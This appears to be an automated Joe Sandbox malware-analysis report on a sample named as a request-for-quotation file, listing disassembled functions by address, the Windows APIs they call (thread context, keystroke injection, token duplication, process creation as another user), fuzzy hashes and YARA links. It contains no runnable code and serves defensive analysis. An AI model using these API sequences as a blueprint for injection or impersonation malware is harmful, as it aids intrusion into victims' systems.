                                                        • Source File: 00000000.00000002.1748191586.00000000040B1000.00000040.00000020.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_40b1000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                        • String ID:
                                                        • API String ID: 2438371351-0
                                                        • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                        • Instruction ID: eb42568a335047376c159ff47f486d66166df9a943e028fcf97c709347416eb6
                                                        • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                        • Instruction Fuzzy Hash: 3912EE24E24658C6EB24DF60D8507DEB232EF68300F1090E9910DEB7A5E77A5F81CF5A
                                                        Function 00402F00 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        • Opcode ID: 2ec043aaf64e314fdfe098a877e83977fff65afecd88cb3d034e09a745a7999d
                                                        • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                        • Opcode Fuzzy Hash: 2ec043aaf64e314fdfe098a877e83977fff65afecd88cb3d034e09a745a7999d
                                                        • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                        Function 00402780 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        • Opcode ID: ec783aa1ebc181f1e071a9faa7f74e4a4b8ea4e749bbcb088fca64aa50fa2dab
                                                        • Instruction ID: 412edbf2df7bf8c64f36b821a583ca4e96a0f18e0b9aed18a790d0e499aeb9a1
                                                        • Opcode Fuzzy Hash: ec783aa1ebc181f1e071a9faa7f74e4a4b8ea4e749bbcb088fca64aa50fa2dab
                                                        • Instruction Fuzzy Hash: 60319CB9600A21EFC714DF19C580A62F7E0FF08310B14C57ADA89CB795E774E892CB99
                                                        Function 00410CFC Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID:
                                                        • API String ID: 544645111-0
                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                        • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                        • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                        Function 00408F40 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                        • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                                        • Opcode Fuzzy Hash: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                        • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                                        Function 0045E17D Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                                                        • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                                                        • Opcode Fuzzy Hash: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                                                        • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                                                        Function 00444AF8 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                        • _memmove.LIBCMT ref: 00444B34
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _malloc_memmove
                                                        • String ID:
                                                        • API String ID: 1183979061-0
                                                        • Opcode ID: 2b93bc58ca1a4befc50711bb88b1a44cc78799b6a6930b0e7ec3687d2c92375e
                                                        • Instruction ID: 1ab6fe9f530497837eb86deb75815884a9af672873ccf792f11a5e6f6739e6df
                                                        • Opcode Fuzzy Hash: 2b93bc58ca1a4befc50711bb88b1a44cc78799b6a6930b0e7ec3687d2c92375e
                                                        • Instruction Fuzzy Hash: E0016D3220410AAFD714DF2CC882DA7B3EDEF88318711492FE996C7251EA74F9508B94
                                                        Function 00414C76 Relevance: 1.5, APIs: 1, Instructions: 40COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: __lock_file
                                                        • String ID:
                                                        • API String ID: 3031932315-0
                                                        • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                        • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                        • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                        • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                        Function 00443E36 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: FileWrite
                                                        • String ID:
                                                        • API String ID: 3934441357-0
                                                        • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                        • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                                                        • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                        • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                                                        Function 004149C2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: __wfsopen
                                                        • String ID:
                                                        • API String ID: 197181222-0
                                                        • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                        • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                        • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                        • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                        Function 0040DA20 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                        • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                                                        • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                        • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                                                        Function 040B3B90 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Sleep.KERNELBASE(000001F4), ref: 040B3BA1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1748191586.00000000040B1000.00000040.00000020.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_40b1000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID:
                                                        • API String ID: 3472027048-0
                                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                        • Instruction ID: 1938fac4509f8c79d6b41f83c71bc59787a78c393db0fbff8fd10ae25a9f390c
                                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                        • Instruction Fuzzy Hash: FEE0E67494010DDFDB00EFB4D549ADE7FB4EF04301F1005A5FD01E2280DA309D508A62

                                                        Non-executed Functions

                                                        Function 0047C81C Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 674windowkeyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                        • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                        • GetKeyState.USER32(00000011), ref: 0047C92D
                                                        • GetKeyState.USER32(00000009), ref: 0047C936
                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                        • GetKeyState.USER32(00000010), ref: 0047C953
                                                        • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                        • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                        • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                        • _wcsncpy.LIBCMT ref: 0047CA29
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                        • SendMessageW.USER32 ref: 0047CA7F
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                        • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                        • ImageList_SetDragCursorImage.COMCTL32(00B4E470,00000000,00000000,00000000), ref: 0047CB9B
                                                        • ImageList_BeginDrag.COMCTL32(00B4E470,00000000,000000F8,000000F0), ref: 0047CBAC
                                                        • SetCapture.USER32(?), ref: 0047CBB6
                                                        • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                        • ReleaseCapture.USER32 ref: 0047CC3A
                                                        • GetCursorPos.USER32(?), ref: 0047CC72
                                                        • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                        • SendMessageW.USER32 ref: 0047CD12
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                        • SendMessageW.USER32 ref: 0047CD80
                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                        • GetCursorPos.USER32(?), ref: 0047CDC8
                                                        • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                        • GetParent.USER32(00000000), ref: 0047CDF7
                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                        • SendMessageW.USER32 ref: 0047CE93
                                                        • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,03011A38,00000000,?,?,?,?), ref: 0047CF1C
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                        • SendMessageW.USER32 ref: 0047CF6B
                                                        • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,03011A38,00000000,?,?,?,?), ref: 0047CFE6
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                        • String ID: @GUI_DRAGID$F
                                                        • API String ID: 3100379633-4164748364
                                                        • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                        • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                        • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                        • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                        Function 00434418 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133keyboardthreadwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetForegroundWindow.USER32 ref: 00434420
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                        • IsIconic.USER32(?), ref: 0043444F
                                                        • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                        • SetForegroundWindow.USER32(?), ref: 0043446A
                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                        • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                        • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                        • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                        • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                        • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                        • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                        • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                        • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 2889586943-2988720461
                                                        • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                        • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                        • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                        • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                        Function 00446313 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 234processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                        • CloseHandle.KERNEL32(?), ref: 004463A0
                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                        • GetProcessWindowStation.USER32 ref: 004463D1
                                                        • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                        • _wcslen.LIBCMT ref: 00446498
                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                        • _wcsncpy.LIBCMT ref: 004464C0
                                                        • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                        • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                        • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                        • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                        • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                        • CloseDesktop.USER32(?), ref: 0044657A
                                                        • SetProcessWindowStation.USER32(?), ref: 00446588
                                                        • CloseHandle.KERNEL32(?), ref: 00446592
                                                        • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                        Strings
                                                        Memory Dump Source
